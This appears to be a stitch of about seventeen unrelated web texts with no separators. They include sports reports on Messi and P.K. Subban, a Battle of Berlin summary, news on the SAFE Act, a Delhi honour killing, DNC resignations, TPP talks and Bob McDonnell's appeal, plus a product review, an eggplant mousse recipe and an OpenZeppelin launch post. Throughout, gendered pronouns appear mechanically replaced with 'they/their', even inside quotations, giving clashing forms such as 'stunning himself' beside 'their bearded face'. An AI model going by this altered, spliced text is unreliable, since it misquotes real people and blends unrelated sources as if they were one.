Second reason why we will always remember point-four is the drama created by the shot that preceded it. Tim Duncan had just put the Spurs up by 1 with a off balance shot at the top of the key, leaving only the famous 0.4 seconds on the clock. The game winning shot put the Lakers up 3-2 in the semi-finals series and the Lakers closed out the Spurs in the following game at home.
-Fern Rea
Follow Raining3s on Twitter: “@raining3sdotcom” Also, on Instagram: @raining3sdotcom
Like Raining3s on Facebook!!!
Subscribe to our YouTube Channel, Youtube.com/raining3sTV
Writer & NBA fan who's been hooked since the days of Magic v Bird. Love basketball debates without it ending in a knife fight. My BBall nickname: “Todo El Dia” (All Day.) Hit me up on Twitter @fullcourtfern or Instagram: @raining3sdotcom
- video encodings still in process -
The Battle of Berlin was a British bombing campaign on Berlin from November 1943 to March 1944. The campaign period was not limited to attacks solely on Berlin, other German cities were attacked to prevent the concentration of defences in Berlin, and Bomber Command had other responsibilities and operations to conduct. The campaign was launched by Arthur "Bomber" Harris, AOC of RAF Bomber Command in November 1943. Harris believed this could be the blow which broke German resistance: "It will cost us between 400 and 500 aircraft. It will cost Germany the war."[5] By this time they could deploy over 800 long-range bombers on any given night, equipped with new and more sophisticated navigational devices such as H2S radar. Between November 1943 and March 1944 Bomber Command made 16 massed attacks on Berlin.It is generally accepted that the Battle of Berlin was a failure for the Royal Air Force (RAF) as it was not the knockout blow that Harris had predicted and during the battle, the RAF lost 1,047 bombers, with a further 1,682 damaged, and well over 7,000 aircrews, culminating in the raid on Nuremberg on 30 March 1944, when 94 bombers were shot down and 71 damaged, out of 795 aircraft.[6][7][8][9][10]There were many other raids on Berlin by the RAF and the USAAF Eighth Air Force in the strategic bombing campaign of 1940–1945 and this is reflected in the RAF battle honour which is for bombardment of Berlin by aircraft of Bomber Command 1940–1945.[11]Prior to the battle of Berlin, Berlin had been subject to a large raid on 23/24 August of 700+ aircraft. A raid half that size, losing 7% of the aircraft, had taken place in September.
Written by Ranjan Sharma from Columbus, OH on Dec 23, 2012
Realistic expectations needed ..
I had higher expectations than what these phones deliver - in a side-by-side comparison with a similarly priced Sony MDR 7506, the Sony beats these easily on sound quality, clarity and response. Of course, this is a subjective test as I am not an audio professional. The much maligned (probably on account of their price) Bose QC2 put up a better show as well. The overall construction quality of the Senns and Bose seem to be similar - and both are inferior to the Sony MDRs. What is amazing is the flimsy cable these Senns have - the audio connector seems to be OK, but right where the cable comes out of the phones, I am not sure it would stand up to regular carefree use. One would have to be aware that this could be the weak part of the device.
They are worth the money if the price you get is 40 or below. Definitely not worth 80 or more they show the regular price to be,
Would I recommend this to a friend or family member? Yes
Pros Easy to Use
Simple to Set Up
Easy on the head Cons Flimsy cable
Doesn't compare well to similar priced monitor headphones
Is this review helpful?
Local News
By Christian Abbatecola Published: January 15 2013
The SAFE Act is ready to be signed into law, which means several changes are on the way for New York gun owners.
The SAFE Act, which was approved by the New York State Senate yesterday, has now passed the NY Assembly as well. Fueled by concern over the Sandy Hook tragedy which occurred just one month ago, the State Legislature has crafted some of the toughest gun laws in the Union.
Under the SAFE Act any sale of assault weapons will be subject to a background check, with the exception of transactions made between immediate family members. Internet sales of assault weapons are now illegal in the State.
The restriction on magazine capacity, which previously stood at 10, has now been reduced to 7 bullets. Possession of a magazine with more than 7 bullets in it will be considered a misdemeanor; however, gun owners have a 1 year grace period to sell any such magazines they may already own out of state.
Mental health professionals now must report when they believe a patient may be a threat to themselves or others. Police have been given the ability to confiscate guns from any such potentially dangerous person.
If a gun owner discovers their weapon has been stolen, it is now required that a report be made within 24 hours.
Perhaps most significantly, police will be creating a registry for assault weapons to which current owners of such guns must enroll. The law also changes the definition of assault weapons from any gun with two “military rifle” features (such as muzzle flash suppressors or folding stocks) to any gun with even a single military rifle feature. The unsafe storage of such guns is now a misdemeanor.
Governor Cuomo, who pushed strongly for the SAFE Act and is expected to sign it shortly, has called assault weapons “a scourge on our society” and lauded the lawmakers who voted to pass this act for “coming together in a bipartisan, collaborative manner to meet the challenges that face our state and our nation, as we have seen far too many senseless acts of gun violence.”
While the new legislation does make several profound changes to gun laws in New York State, it will not result in the confiscation of any guns (with the possible future exception of mentally unstable individuals) as has been previously discussed.
Venkateswara College, Delhi University Venkateswara College, Delhi University
In a suspected case of honour killing, a 21-year-old Delhi University student was strangled by their parents, who later allegedly set their body on fire, just three days after their marriage to their friend against their wishes. The accused were arrested on Tuesday and sent to judicial custody by a Delhi court.
"The accused have been charged with murder, but we are investigating if it is a case of honour killing," a senior police official said.
Bhavna Yadav was allegedly killed on the intervening night of November 15-16 by their father Jagmohan Yadav and mother Savitri Yadav at their house in south-west Delhi's Dwarka North. After killing their daughter, the parents took their body to their village in Alwar, Rajasthan, where they set it on fire, police said.
According to DCP south west district, Suman Goyal, Bhavna's husband informed the police. Bhavna had married 24-year-old Abhishekh Seth on November 12 against the wishes of their family members. Police said they began probing the case after Abhishek, an assistant programmer in the Rashtrapati Bhavan, made a written complaint on November 16 at Dwarka North police station. In their complaint, Abhishek had expressed suspicion of a foul play as Bhavna did not contact them after their marriage.
Police contacted victim's parents at their village in Alwar and took them in custody when they failed to give information about their daughter. "While questioning they broke down and admitted that they had strangled their daughter at their Delhi home," said the officer. The parents told the police that they called them back to their home when they informed them on November 12 about their marriage.
The victim was a Sanskrit honours student of Venkateswara College.
Businesses were closed as a precaution while experts investigated the luggage on Dunbar High Street on Sunday.
Patrycja Lipinska
The bomb squad were called over reports of a "suspicious suitcase" lying outside an Indian takeaway in East Lothian.
Three businesses on Dunbar High Street were closed as a precaution after police were alerted at 9.30pm on Sunday.
Experts from the explosive ordnance disposal team investigated the luggage, which was found not to be a risk to the public.
A spokesperson for Police Scotland said: "Officers in Dunbar responded to a report of a suspicious item left unattended on the High Street.
"A member of the public contacted the police shortly after 9.30pm on Sunday after noticing a suitcase lying on a pavement outside a takeaway.
“Upon inspection the luggage was found to pose no ongoing risk to the public and has been safely removed.
"Our enquiries are ongoing and the local community is thanked for their patience and cooperation."
On social media, a spokesperson for the Shapla Tandoori said: "People should really take extra care in what they do with their things.
"Much love and respect to everyone who understands and we apologise for the inconvenience caused."
Feedback: We want your feedback on our site. If you've got questions, spotted an inaccuracy or just want to share some ideas about our news service, please email us on web@stv.tv.
Download: The STV News app is Scotland's favourite and is available for iPhone from the App store and for Android from Google Play. Download it today and continue to enjoy STV News wherever you are.
Join in: For debate, chat, comment and more, join our communities on the STV News Facebook page or follow @STVNews on Twitter.
Updates: Would you like STV's latest news update in your inbox every morning? Choose from our range of regular e-newsletters here.
President Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say they should get less than 10 years in prison MORE on Saturday tore into the "FAKE" media's coverage of their first 100 days in office, accusing news organizations of ignoring the "great optimism" surrounding their administration.
"Mainstream (FAKE) media refuses to state our long list of achievements, including 28 legislative signings, strong borders & great optimism!" Trump wrote on Twitter.
Mainstream (FAKE) media refuses to state our long list of achievements, including 28 legislative signings, strong borders & great optimism! — Donald J. Trump (@realDonaldTrump) April 29, 2017
ADVERTISEMENT
The symbolic 100-day mark is viewed as an early test of an administration's effectiveness, and Trump has gone on a media blitz this week to tout their achievements since taking office, with a rally scheduled for Saturday night, too.
The president has acknowledged difficulties during their time in office, which has seen no major legislative victories and a number of controversies over their executive orders being blocked in courts.
Their first major legislative undertaking – a measure to repeal and replace ObamaCare – was pulled from consideration last month amid dwindling support among congressional Republicans.
A second attempt at healthcare reform also floundered on Thursday, when House GOP leaders announced that a revised bill would not come to a vote this week. Trump has said they expect another vote to take place soon.
Trump is also facing legal challenges to two executive orders relating to immigration, including a controversial travel ban barring citizens of six Muslim-majority countries from entering the U.S. The president has vowed to appeal the rulings.
Trump's first 100 days have also had a shadow cast over them by ongoing federal investigations into alleged ties between their presidential campaign and Russia. The Senate and House intelligence committees are probing the matter, and the FBI is conducting its own investigation.
Trump's tweet Saturday echoed one they sent earlier this month, when they predicted that the “media will kill” any celebration of their early accomplishments.
“No matter how much I accomplish during the ridiculous standard of the first 100 days, & it has been a lot (including S.C.), media will kill!”
No matter how much I accomplish during the ridiculous standard of the first 100 days, & it has been a lot (including S.C.), media will kill! — Donald J. Trump (@realDonaldTrump) April 21, 2017
Trump has frequently attacked the media over perceived negative coverage, and often refers to news outlets that cover them critically as "fake news."
With my first post published here back in late November of 2014 I presented a graphic presentation of P.K. Subban's shots on goal through first 20 games of the 2014/15 regular season. Now that we've reached the halfway mark, it's time for the updated visualization. Subban produced 77 shots on goal which is considerably less than they had at halfway mark last season (120). They scored eight goals and has been more effective if compared to first half of the 2013/14 - with 43 fewer shots on net they managed to score two more goals. Here's the graphic which illustrates shots on goal generated during 41 games, except for the four shots the 25-year-old defenseman fired from the own half of the ice.
Also four is the number of shots Subban took inside the home plate area. At first glance, the shots on goal locations look to be pretty evenly distributed on both sides, but if we look closer we can see that Subban more frequently triggered shots from the right side. This is to be expected for a player who spends more time on the right side of the ice. It all becomes even more obvious if we look only at even-strength shots on goal which is what the next chart reveals.
Majority of those shots on goal were taken from right point, but only one of their five goals at even strength was scored from there.
Next, a look at Subban's shots on goal when Canadiens had man advantage. For that, here's a chart with 29 power-play shots on goal.
What we can see is the opposite of the previous chart, meaning that the majority of shots were taken from left point despite the fact the Habs were forced to make adjustments on power play, often times shifting Subban from left to right point. It has to be said thought, all three of their power-play goals were scored from the left side on shifts which they started on the left.
Pernell Karl Subban is on pace to end up with 154 shots on goal which would be exactly 50 less than last season, but they would also finish with 16 goals, six more than in previous year, if we would simply double their midseason numbers. It's impossible to predict what the future holds for Montreal's star defenseman, but right now it's hard to believe they can double the goal count, after all, the last time P.K. scored was a month ago when the Habs beat the defending Stanley Cup champions LA Kings.
I'll be updating my data and will look at the numbers and present the visualizations again after the final regular season game is played.
EAST RUTHERFORD, N.J. (AP) — Lionel Messi put their penalty kick over the crossbar, grabbed their shirt, clenched their teeth and covered their face with both hands.
A few minutes later they walked off the field, a dazed, pained look on their bearded face. The greatest player of their generation, perhaps soccer's best ever, they were still without a title on Argentina's national team — one they say may never come.
“The national team is over for me,” they told the Argentine network TyC Sports after Chile beat the Albiceleste on Sunday night for the Copa America title. “It's been four finals. It's not meant for me. I tried. It was the thing I wanted the most, but I couldn't get it, so I think it's over.”
Chile beat Argentina in the final for the second straight year, 4-2 in the shootout following a 0-0 tie that ended an expanded 16-nation Copa in the United States to mark the championship's 100th anniversary.
Messi, five-time FIFA Player of the Year, winner of four Champions League titles and eight Spanish La Liga crowns with Barcelona, was crushed. Much of their nation had counted on them and the top-ranked Albiceleste to bring home the nation's first major championship since 1993.
Playing two days after their 29th birthday, Messi lost a final for the third year in a row and the fourth time overall with Argentina. There was also the 2007 Copa final against Brazil, when they were still a wunderkind, and then an extra-time loss to Germany in the 2014 World Cup.
Considered alongside Brazil's Pele and Argentina's Diego Maradona as the sport's greatest, Messi won the titles at the under-20 and Olympic (under-23) levels for Argentina. But in the minds of many they need a championship with the senior national team to solidify their place in history.
“Messi's numbers are unparalleled and I think they'll remain that way forever, because it's impossible for a football player to do what Messi has done,” said Chile coach Juan Antonio Pizzi, who is from Argentina. “My generation can't compare them to Maradona — that's for my generation, because of what Maradona did for Argentine soccer. But I think the best player ever played today here in the United States.”
A crowd of 82,026 filled MetLife Stadium — the largest to see a soccer game in New Jersey — and many wore Messi's No. 10 jersey in Argentina's blue and white and Barcelona's navy and maroon.
Francisco Silva converted the shootout finale for the fifth-ranked La Roja after goalkeeper Claudio Bravo — Messi's Barcelona teammate — made a diving stop on Lucas Biglia's attempt.
On an ill-tempered evening that included a first-half ejection on each side and eight yellow cards, the game was scoreless through regulation and 30 minutes of extra time, with Argentina's Gonzalo Higuain missing a clear goal-scoring opportunity for the third straight final. Argentina outshot Chile 16-4 and La Roja collapsed three, four and even five defenders around Messi, then chopped down the diminutive attacker when they tried to accelerate toward the goal.
Messi, who scored five goals in the tournament, sent a free kick that Sergio Aguero nearly headed in 10 minutes into extra time, only to have Bravo jump and extend their right hand to tip the ball over the crossbar. Messi's free kick in extra time went off the wall.
Argentina goalkeeper Sergio Romero saved the opening kick by Arturo Vidal, and up stepped Messi, Argentina's captain and career scoring leader with 55 goals. They sent their shot into the stands, stunning himself, both teams and the crowd.
Nicolas Castillo and Charles Aranguiz converted their kicks for Chile, and Javier Mascherano and Aguero made theirs, leaving the teams tied 2-2 after three rounds.
Jean Beausejour put Chile ahead, and Bravo dived to their right, saving Biglia's shot and bringing up Silva, a 30-year-old midfielder. Messi briefly pulled their jersey over their face, as if not wanting to watch. Romero dived to their left and the shot went in to their right, giving Chile another title.
Messi crouched over, as if in pain, then got up, took off their captain's armband and walked to the bench, where they were consoled by teammate Angel Di Maria. After Messi came back on the field, Aguero put a hand on one of Messi's shoulders. And new FIFA President Gianni Infantino gave Messi a pat on the back when Messi came onto the podium with their teammates for their second-place medal. Messi almost immediately took it off.
“The burden of the consecutive games (lost) has been accumulating these last two years,” Argentina coach Gerardo Martino said. “He feels like you would expect a player to feel after playing and losing a final.”
The tournament's average crowd of 46,119 was nearly double the 25,223 in Chile last year, and attendance will be used by the U.S. Soccer Federation as justification it deserves to host a World Cup again, likely as part of a bid for the 2026 tournament.
Brazilian referee Heber Lopes became the focus in the first half, ejecting a pair of defenders: Chile's Marcelo Diaz in the 28th minute and Argentina's Marcos Rojo in the 43rd. After issuing six yellow cards during a World Cup qualifier between the nations in March, Lopes handed out eight yellows, including one to Messi for diving in the 40th minute, and the two reds.
Diaz got their first yellow for hacking down Messi about 28 yards out in the 16th minute, then got their second for obstructing a charging Messi about 30 yards out. Rojo received a straight red when they slid into Vidal from behind and poked away the ball, but Vidal's leg bent awkwardly under their body as they fell.
Higuain had the best first-half chance in the 21st minute when they picked up Gary Medel's giveaway, dribbled in and chipped the ball over Bravo only to have it roll wide of the far post. It was almost the exact time they broke in alone during the World Cup final against Germany and also shot wide. Higuain also missed a tap-in of Ezequiel Lavezzi's cross during the final minute of regulation in last year's final, then sent their penalty kick during the shootout over the crossbar.
For Argentina and Messi, titles keep slipping away.
Enlarge Image Screenshot by Michelle Starr/CNET
The latest victim in a long line of high-profile twitter attacks is the CEO of Pokémon Go developer Niantic, John Hanke. On July 31, a series of Tweets was posted to Hanke's 16,000 followers. They were hashtagged "OurMine" and claimed the hack was for Brazil, where Pokémon Go has yet to be released.
One tweet also claimed that Hanke's password was "nopass," but the Quora links to the hacker's explanations have been removed. Interestingly, OurMine is a company that claims to assess social network account security, so the hack seems like a marketing stunt, directing users to upgrade account security. Nevertheless, over on the hashtag, the stunt has gained a reaction, including people in Brazil who think the hack is a poor way to get a point across, and players in other countries who object to the recent update to the game.
Exactly how OurMine gained access to Hanke's password is unknown. The company did not immediately reply to a request for comment.
Kuwait was the only nation to prohibit the entry of Syrians prior to Donald Trump's executive action.
Kuwait has suspended the issuance of visas for nationals of Syria, Iraq, Pakistan, Afghanistan and Iran.After US President Donald Trump's executive order banning seven Muslim-majority countries last Friday, the Kuwaiti government has told would-be migrants from the five banned nations to not apply for visas, as it is worried about the possible migration of radical Islamic terrorists, Sputnik International reported.Under the executive order signed by Trump, refugees from all over the world will be denied US entry for 120 days while all immigration from so-called "countries with terrorism concerns" will be suspended for 90 days. The countries included in the US ban are Iraq, Syria, Iran, Sudan, Libya, Somalia and Yemen.Kuwait was the only nation to prohibit the entry of Syrian nationals prior to Trump's executive action. Kuwait City previously issued a suspension of visas for all Syrians in 2011.A group of terrorists bombed a Shia mosque in 2015, killing 27 Kuwaiti nationals. A 2016 survey conducted by Expat Insider ranked Kuwait one of the worst nations in the world for expatriates, primarily due to its strict cultural laws.As a member of the Gulf Cooperation Council (GCC), Kuwait has become embroiled in escalated tensions between the GCC and Iran. Washington has been a guarantor of GCC security since the early 1990s, according to a Congressional Research Service brief.Observers have pointed out that most of the nations on Trump's list have substantial Muslim populations and are experiencing some form of economic or military conflict.
A vision came to me in my sleep. A vision of eggplants being used for evil… being used…for dessert!
Having just received two eggplants in my CSA basket, I decided to make this vision come true.
I give you a gluten free, dairy free, paleo, vegetarian, low carb, insert-dietary-need-here dessert that is beyond decadent and will induce feelings of guilt and drool.
Behold! I give you chocolate mousse made from EGGPLANT!!
This recipe only has three ingredients – eggplant, sweetener and cocoa powder. Use a high quality cocoa powder to make this a truly decadent experience. I prefer NuNaturals Liquid Stevia as my sweetener of choice and adore it. The liquid sweetener for this recipe helps prevent graininess that you might get from a granular sugar, such as Swerve.
First, you gotta roast your eggplants. Cut your eggplants in half and score them with a knife – salt liberally and let them sit for thirty minutes, upside down on a cooling/cookie rack, so they can sweat out any bitterness.
Pre heat oven to 415, wipe your eggplants down and put them on a baking tray and drizzle with olive oil. After about 45 minutes in the oven, they'll be super tender/squishy. Remove and let cool.
Chocolate Mousse (with secret vegetable ingredient) Print Recipe Low carb chocolate mousse (with secret vegetable ingredient) Print Recipe Low carb chocolate mousse Ingredients 2 Eggplant Small to Medium Optional 1 Avocado Medium Cocoa Powder
Liquid Stevia Servings: Instructions Scoop insides of eggplants and put into a blender (Vitamix preferred for extra smoooothness) Blend until super smooth Scoop eggplant out of blender and into bowl - add several tablespoons of cocoa powder and stir until blended Add several drops of stevia, stir until blended Repeat the cocoa powder/stevia until you get a combination that is to your tastes If adding the avocado, blend into mixture - it will make the mousse a little bit more 'creamy/light' versus 'rich/fudgy' and adds a bit of extra fat. Share this Recipe Powered by WP Ultimate Recipe
You can bake/puree the eggplant the night before as well. Makes 4 small (but VERY decadent/filling) servings. Go crazy and put fresh raspberries, almonds, or homemade whip cream on top. SERVE IMMEDIATELY/SAME DAY. Eggplant changes over time, and the sweetness decreased end of the next day.
Grab an immersion blender and beat up some whole cream to add a dollop of whip cream on top of the mousse. The whipped cream helps balance out the sweetness of the fudge; I love it!
Thanks to Jimmy Moore for challenging me to add an avocado! Normally I dislike putting avocados in my desserts (had a bad experience before) but this worked out nicely. 🙂
The Democratic National Committee's CEO and two other top officials have resigned in the wake of the leaked email controversy that marred the start of the party's convention last week – in the latest shake-up at party headquarters.
According to a DNC statement, CEO Amy Dacey; chief finance officer Brad Marshall; and communications director Luis Miranda left their jobs on Tuesday.
The resignations mark the latest fallout from the email scandal that forced Chairwoman Debbie Wasserman Schultz to step down on the eve of the Philadelphia convention. Those hacked emails exposed what appeared to be a pro-Hillary Clinton bias among top officials who at times disparaged primary rival Bernie Sanders.
Marshall had written the most explosive email, questioning Sanders' Jewish faith and suggesting they could be portrayed as an atheist.
They had written: “… They had skated on saying they have a Jewish heritage. I think I read they are an atheist. This could make several points difference with my peeps. My Southern Baptist peeps would draw a big difference between a Jew and an atheist.”
They have since apologized for the missive.
Longtime Democratic operative Donna Brazile is now serving as the party's interim chair.
Brazile said Tuesday that they have created a "transition team" to help prepare the party for its post-election mission. They said Tom McMahon, a former DNC executive director under then-Chair Howard Dean, will lead that group.
In a statement, they thanked the departing officials for their work on fundraising and the party platform.
They said: “This election is the most important of my lifetime, and the DNC will continue to recruit top talent to help lead the fight to elect Hillary Clinton and Democrats across the country. I am committed to adding to our team of skilled professionals who will make sure that Donald Trump is held accountable for their reckless rhetoric and harmful policies.”
Clinton operatives who moved over to party headquarters after they had effectively secured the nomination in June will continue in their roles; that group includes DNC chief of staff Brandon Davis. Additionally, veteran Democratic strategist Doug Thornell will serve as an interim senior adviser to the party.
Dacey already has a new job. They have been hired by Squared Communications, a Democratic consulting firm based in Washington.
"As one of the top campaign strategists in our party, and with our experiences together on presidential, Senate and congressional campaigns, Amy will help our firm's clients navigate this and future election cycles," Michael Meehan, founder and CEO Squared Communications, said in a statement.
Before joining the DNC, Dacey was a executive director of EMILY's List, which works to elect female Democrats.
The cache of more than 19,000 messages was made public by the group WikiLeaks just before the convention.
Democratic Party officials learned in late April that their systems had been attacked after they discovered malicious software on their computers. A cybersecurity firm they employed found traces of at least two sophisticated hacking groups on the Democrats' network -- both of which have ties to the Russian government.
The Associated Press contributed to this report.
Long ago…the world prospered and humanity thrived thanks to a power known as Mana. However, humans soon sought to use Mana to create the ultimate weapon—a floating battleship called the Mana Fortress. This greedy arrogance angered the gods, who in turn unleashed vicious beasts into the world.
A violent war between the Mana beasts and the fortress engulfed the world in poison and fire until Mana had all but disappeared. In humanity's bleakest hour, a hero wielding the Mana Sword appeared and destroyed the fortress. The world was left in shambles, and yet humanity persevered and there was peace throughout the land.
But as time passes…so history repeats…
Advertisement ▼
Secret of Mana holds a special place in my heart as one of my childhood all-time favourite JRPGs on the Super Nintendo, alongside the cult-classic, Chrono Trigger, also on the SNES. While using emulators gave me access to rekindle my love with game in this day and age, nothing beats having it legitimately on a current generation platform, and what better platform than the almost ubiquitous PlayStation 4 to launch the remake of Secret of Mana! It will also be portable via the PlayStation Vita.
Bringing the classic 2D elements into the realm of 3D, the beautiful world of Mana has been remade to present day standards, characters now have voiceovers, and there are going to be additional content in the form of events and conversations to be had in the new remake. A fully rearranged soundtrack based on original composer Hiroki Kikuta's work looks to add new life to the classic, and Square Enix is also adding remastered sound effects to enhance the experience further.
And yes, the game supports offline multiplayer on a single PS4, so you'll need 3 controllers on hand. There are currently no plans to enable online co-op play as yet, unfortunately. As for the PS Vita version, players can co-op via the ad-hoc network, which should make for some fun get-together sessions while on the go!
To further entice gamers old and new, Secret of Mana will also have a really awesome Collector's Edition, which comes in a special box. The contents include a limited edition pop-up nook, CD Soundtrack, and figurines of our heroes Randi, Primm, and Popoi, and of course, the game! So if you are as excited as we are, look out for Secret of Mana, which launches February 15, 2018 for both the PS4 and the PS Vita!
Drop a Facebook comment below!
HANOI (Reuters) - Remaining members of the Trans Pacific Partnership (TPP) free trade agreement are working on a statement to reaffirm their commitment to it, despite the withdrawal of the United States, sources close to the discussions said.
A woman bikes past a banner welcoming APEC trade ministers for a meeting in Hanoi, Vietnam May 19, 2017. REUTERS/Kham
Some still hope for the eventual return of the United States to the deal ditched by U.S. President Donald Trump, because of their readiness to shift position on other issues, Malaysia's trade minister said.
Talks are happening on the sidelines of an Asia-Pacific Economic Cooperation (APEC) meeting, the biggest trade gathering since Trump upended the world order with their “America First” policy.
The competing visions are evident at this weekend's APEC meeting of ministers from countries that account for well over 40 percent of world trade.
While new U.S. Trade Representative Robert Lighthizer will hold bilateral talks with key countries, China will be pushing its favored Asian trade agreement as it puts itself forward as a global free trade champion.
Japan is leading the countries that still want to persist with the much more comprehensive TPP agreement, abandoned by Trump in one of their first acts in office and which does not include China.
Sources close to the discussions said the so-called TPP-11 nations - the 11 left after the United States withdrew - were planning a statement of commitment to the pact.
“There will be two main points: 1. To aim for an early entry into force of the TPP-11, 2. To bear in mind an environment where a signatory country can return,” said one source close to the discussions who was not authorized to speak to the media.
The agreement is due to take effect next year.
CHALLENGES
Among the challenges is keeping on board Vietnam and Malaysia, which would have been big beneficiaries from the agreement if it included the United States.
Some renegotiation would be needed for the deal to proceed without the United States, Malaysian Trade Minister Mustapa Mohamed told Reuters. A Vietnamese official expressed a similar view.
Mustapa said there was optimism the United States would return one day, because Trump had shown readiness to shift their position on other matters, such as softening their stance toward China.
“There has been less rhetoric and a more realistic approach,” they said.
However, renegotiating the existing North America Free Trade Agreement (NAFTA) is a bigger immediate priority for Washington.
In Hanoi, Lighthizer is due to hold two-way meetings to start making official contact with key trade officials.
Nearly all the other 20 members of APEC had requested bilateral meetings, U.S. officials said.
Main countries are China, Japan and South Korea, with which Trump wants to renegotiate a free trade deal. Canada and Mexico will be at the Asia-Pacific meetings and are also in the North American trade area.
In other talks on the sidelines, China will be driving for progress on its favored trade deal for Asia: the Regional Comprehensive Economic Partnership.
A man stands in front of a banner welcoming APEC trade ministers for a meeting in Hanoi, Vietnam May 19, 2017. REUTERS/Kham
The free trade agreement doesn't cover as many areas as the TPP deal or demand tough conditions for members on issues such as protecting intellectual property, labor rights or the environment.
Officials said there remained significant points of disagreement in the talks between Southeast Asian countries, China, India, Australia, New Zealand, Japan and South Korea. The United States has never been part of those discussions.
Given the uncertainty over TPP, the China-backed deal was now the priority for Malaysia, Mustapa said.
OpenZeppelin: a New Standard for Secure Blockchain Applications
Demian Brener Blocked Unblock Follow Sep 15, 2016
Blockchain technology holds the great promise of enabling decentralized protocols, applications and organizations. Much of this enthusiasm is driven by Bitcoin and Ethereum, the main software platforms where these are built.
Yet, we've seen $60m+ lost to hacks to blockchain-based projects in the past 6 months. Recent scandals have exposed the high risks and challenges every project faces: how to write simple and secure code that deals with real money.
Still, there are no widely adopted security standards or best practices for projects to follow. There are no tools for developers to easily create, test, verify and audit smart contracts, and do so collaboratively.
We believe that the only way to making this happen is for existing and emerging projects to cooperate and build them.
Enter OpenZeppelin
OpenZeppelin is an open-source framework to build secure smart contracts. It's meant to provide secure, tested and audited code to enable the new generation of distributed applications, protocols and organizations. OpenZeppelin is a community effort to reduce the hurdle to develop and use them.
Today we are publishing a framework proposal and development roadmap for OpenZeppelin. Feel free to comment and give us feedback.
At Zeppelin Solutions, we believe in an open financial and economic system for the world. We've been working on using blockchain technology to improve the experience of creating and running businesses. We plan to use OpenZeppelin as the core technology to achieve this vision.
Any organization can be modeled as a set of contracts and rules that define interactions, rights and obligations between parties. With OpenZeppelin, we aim to model simple business rules with code, turning basic components of an organization into software:
Cap table becomes a token management contract
Cashflow becomes a fund management contract
Payroll becomes a payout contract to operators for their contribution to the organization
Invoicing (income generation)
Procurement (payouts to suppliers)
Assets (possessions)
Liabilities (obligations)
In the following months we will be exploring new use cases and business models that would be impossible to accomplish using traditional corporations. For example, we plan to create an organization that automatically assigns tokens to developers based on the number of commits and pull requests they contributed to the project.
OpenZeppelin is open-source and MIT licensed. The Zeppelin Solutions team will be an important part of the OpenZeppelin community. We'll make use of our 4+ years of experience working with smart contracts, having built applications (Proof of Existence, Streamium) and libraries (Bitcore) in the blockchain space. We plan to make money by offering services and security audits to users of the framework.
OpenZeppelin is designed for easy collaboration and auditing. If you are working with or interested in smart contracts and blockchain technology, we invite all:
Developers to explore the source code and build distributed apps and organizations with it.
to explore the source code and build distributed apps and organizations with it. Security researchers to explore the source code, give us feedback and report any vulnerabilities.
to explore the source code, give us feedback and report any vulnerabilities. Entrepreneurs to get in touch to enhance your project's security by using OpenZeppelin.
Be part of the community
Please enable Javascript to watch this video
RICHMOND, Va. — Former Virginia governor Bob McDonnell is likely headed to prison after a federal appeals court turned down their request to remain free while they appeal their federal corruption conviction to the Supreme Court.
"The “Motion to clarify order granting release pending appeal or, in the alternative, to stay the mandate pending resolution of a petition for certiorari” is DENIED. That is, the motion to clarify that our Order of January 26, 2015 will remain in force pending the disposition of a timely certiorari petition is DENIED," the 4th Circuit Court Court of Appeals order stated. "The alternative motion to stay the mandate is also DENIED. Pursuant to Federal Rule of Appellate Procedure 41(b), the mandate will issue seven days from the date of the entry of this Order."
According to lawyers, McDonnell could be forced to prison as early as Aug. 27. However, legal experts think a date in September is more likley unless the High Court intervenes.
McDonnell's attorneys have petitioned the Supreme Court to allow the former governor to remain free on bond.
Latest on Bob McDonnell at 5 on @CBS6....below is their emergency stay request to SCOTUS asking to stay out of prison pic.twitter.com/nY7IJIdsX9 — Joe St. George (@JoeStGeorge) August 20, 2015
"I am saddened by the Court's decision today to deny me freedom while I pursue vindication in the U.S. Supreme Court," McDonnell wrote in a statement released Thursday afternoon. "I am innocent of these charges and will petition the U.S. Supreme Court for a grant of bond. I ask my exceptional friends across the nation to continue to support and pray for me and my family during this agonizing time. I thank God for Their abundant grace and strength as I continue this difficult journey."
Earlier this month, the 4th Circuit Court unanimously rejected's McDonnell's second request to consider an appeal.
McDonnell was found guilty of corruption charges and sentenced in January to two years in federal prison. Since then McDonnell has been trying to get their guilty verdicts thrown out.
As a result, McDonnell's lawyer Henry Asbill said their team would appeal the conviction to the Supreme Court.
McDonnell's Final Appeal
However, legal experts have said the chances are slim the Supreme Court will hear the case.
Carl Tobias, a Supreme Court expert at the University of Richmond, says SCOTUS only hears a fraction of the cases that request a Supreme Court hearing. Four justices are needed to hear the case.
"We will see what the Supreme Court does,” said Tobias, who predicted McDonnell attorneys will ask the 4th Circuit as well as the Supreme Court for a stay in their sentence, allowing them to stay out of prison until the Supreme Court decides. Tobias also said it is likely the High Court would be interested in hearing the case, since questions surrounding what exactly is bribery have been brought up as a result.
“Less so because they were an ex governor, more so because of whether or not this was really bribery,” Tobias added. Tobias says in all likelihood McDonnell will receive a date within the next seven days to report to prison and start serving their 2 year sentence. That “report date” will likely be in September.
Former federal inmate Justin Paperny told WTVR CBS 6 reporter Joe St. George last week that McDonnell should mentally prepare for prison.
“If I were him, I would not be speaking negatively about their authority that tends to look a little arrogant,” Paperny says.
Please enable Javascript to watch this video
Paperny, who spent over a year in low security prison for security fraud and now runs a company called Etika which helps defendants prepare for life behind bars, said they should begin thinking about what jobs they will do in prison, they would advice McDonnell to go the teaching route.
“With their experience and background it should include teaching and tutoring,” Paperny said.
Paperny emphasizes that if McDonnell goes to the low security camp in Petersburg, which they have requested, it is still a prison and not a country club like some think. “I was a member of a Country Club before I went to prison and my country club did not have men defecating in the shower and they didn't tell me when I had to go to bed,” Paperny said.
One of the main reasons McDonnell continues to fight for their innocence, other than believing they are not guilty, is their state pension. Under Virginia law, signed into law by McDonnell, a person cannot keep their state pension if convicted of a felony.
Gov. Terry McAuliffe's office released this statement earlier this month per spokesperson Christina Nuckols.
“The Governor requested an opinion from the Attorney General's office to ensure that legal requirements are met. Once the Governor received the opinion, they wrote the former governor to notify them of its conclusions and to inform them of the process for compliance.”
McDonnell Asked to Serve Sentence in Petersburg
McDonnell, who could serve their two-year sentence at one of several federal prisons located within a 500-mile radius of Richmond, requested in January to serve their time at FCI Petersburg in Hopewell. However, Judge James Spencer and the Federal Bureau of Prisons will ultimately decide the location.
